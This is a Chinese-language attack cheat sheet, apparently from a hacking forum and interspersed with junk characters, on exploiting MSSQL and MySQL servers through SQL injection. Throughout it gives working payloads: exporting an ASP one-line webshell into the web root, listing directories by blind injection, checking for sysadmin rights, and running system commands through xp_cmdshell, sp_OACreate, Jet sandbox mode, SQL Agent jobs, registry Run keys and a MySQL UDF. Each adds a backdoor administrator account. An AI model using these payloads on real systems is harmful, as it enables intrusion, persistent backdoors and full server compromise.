MSSQL语句导出一句话木马9 n" q) r" r: a, Y
首先确定网站的WEB路径
9 N: y: Q+ P4 U! @, T/ M/ E;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马* s. o# m" _5 `
7 u( c# T, T( G;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 6 a0 O4 a1 j; z! y9 P5 w
//将一句话木马插入表中2 K# b0 B3 \% R3 d
* ~; P" b3 U6 y, S/ f
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
; J! j1 w% X$ R% M8 q! I//导出一个ASP文件0 K6 i5 H- Z. a: F7 A. e
/ O+ E0 N- y; O
9 S/ G8 t# f! g. g$ Q关于MSSQL列目录; \9 C- w' z4 H T; R2 T; H
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
7 F5 d" H6 i5 V) _# S: wInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
4 o' B4 n" x' P* D. [+ c5 W; n% b2 `7 q! J5 X! U+ Q i
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录! m2 b" f8 h! y! Q5 R. k+ j
* x/ l5 d1 ^) [' mAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段 T1 w8 k& f$ e4 V. `. q' x& g
# ^4 @1 ?& y( C$ MAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符9 k7 I2 V' i6 _% a5 h! I
p, x! v4 L- G E) A/ c
- ]- W7 @6 B0 d% I# k; s5 c
数据库版本和权限查看
; Y4 H% f0 Q, mand 1=(select @@VERSION) //查看详细的数据库信息.
- _+ R8 y$ g/ Vand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA" Z4 b: ]- ~2 l# Q N G3 M
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
: c, o, k% x* j2 V
; s% z( P% N6 G# ]9 |$ h6 @4 C! M% `0 e+ k9 v, ~7 ~' O/ B
1.利用xp_cmdshell执行命令1 V/ L, A- i6 _) T/ W0 v1 o# }- u: c
exec master..xp_cmdshell 'net user rfire 123456 /add'' J, t/ Q8 @1 u
exec master..xp_cmdshell 'net localgroup administrators rfire /add'' Y5 j" F0 F9 N$ V) t1 P
# V' X! y5 e. y% [! S4 Y5 I
恢复xp_cmdshell存储过程* ^- W$ [4 y7 b% H% p+ f% I7 {
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'" i0 A1 E, e! t4 r- @: B7 S
. B% C/ x, G3 L# M: K* T( F
S6 q( b0 j: f }% K2.利用SP_OAcreate和SP_OAMETHOD执行命令5 m% n: C% h5 R6 J; Y; M+ ~, K
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
* H( z$ v7 W Q; a# {DECLARE @shell INT //建立一个@shell实体: Q3 D/ @) n& C: x3 ?; K; z
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
6 k, X- P, z' O- Q, f! aEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例9 g, C9 B# U& s9 h4 F1 k3 Q" g2 K
7 ^, Q. |. W; y: A0 F3 ?! O( c
! N9 o6 L$ i& Y3 r9 a3.利用沙盒模式9 E7 M1 g8 \# j. f* W1 ^
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。1 R3 \% e, C7 e+ N+ p5 d
开启沙盒模式:
8 ?* W5 i, ^8 Y3 h" M( ]EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0' V5 P& a" V* c { P$ m' L0 o
5 s# m' j0 @0 s$ F1 s+ y% k9 v$ j5 c
执行命令:8 i Z( {& S" x0 |* K3 C1 \2 W
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
0 @* F3 T/ T1 C+ P7 ]" f% K' e; X" h- k: Y* S' q4 z
+ w2 l; c" ?* ?: U( g, j3 F4.利用SQL代理执行命令
9 [# t8 a$ e1 C1 F0 \+ H7 hEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
8 F* t' F' A o, N/ k2 d. w6 R& T4 G; s/ K4 V! {/ w7 }
执行命令:# t1 r: M% C) S2 p
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错* H) J. e% i( J# x! A0 C0 h
exec sp_add_job 'x'7 K; ?5 C# D+ p# B1 T+ S
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
u; w: n2 Y# |) f/ Q/ m6 {exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
; x: C$ M6 R. L9 p
, Y+ | d' R' F9 C/ B
7 f* d2 H# [2 R! Z$ M9 o0 A5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
Y7 e9 a$ I! X' Q9 SEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
K2 f; f6 \, G
! k1 R% T3 a6 x8 e7 I' k0 f' |( A" ^4 f; b/ j% e+ L9 E8 ]: e
6.MYSQL的命令执行/ Y1 F2 w3 L+ Q) d; z
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
! A7 t# ^9 b" C- A C首先要在su.php下导出c:\windows\udf.dll
# [2 r+ }6 w7 D! T7 A: ]导出后执行创建自定义函数命令:, g5 M2 t3 s1 h( J" a" C; o+ ~
Create Function cmdshell returns string soname 'udf.dll'
+ R+ E- N4 i0 G/ y执行命令: W1 K! a& B: e
select cmdshell('net user rfire 123456 /add')
( r, K; A' u2 N9 @/ R执行后删除函数 drop function cmdshell
w' r/ [ d# N1 |7 |$ ? |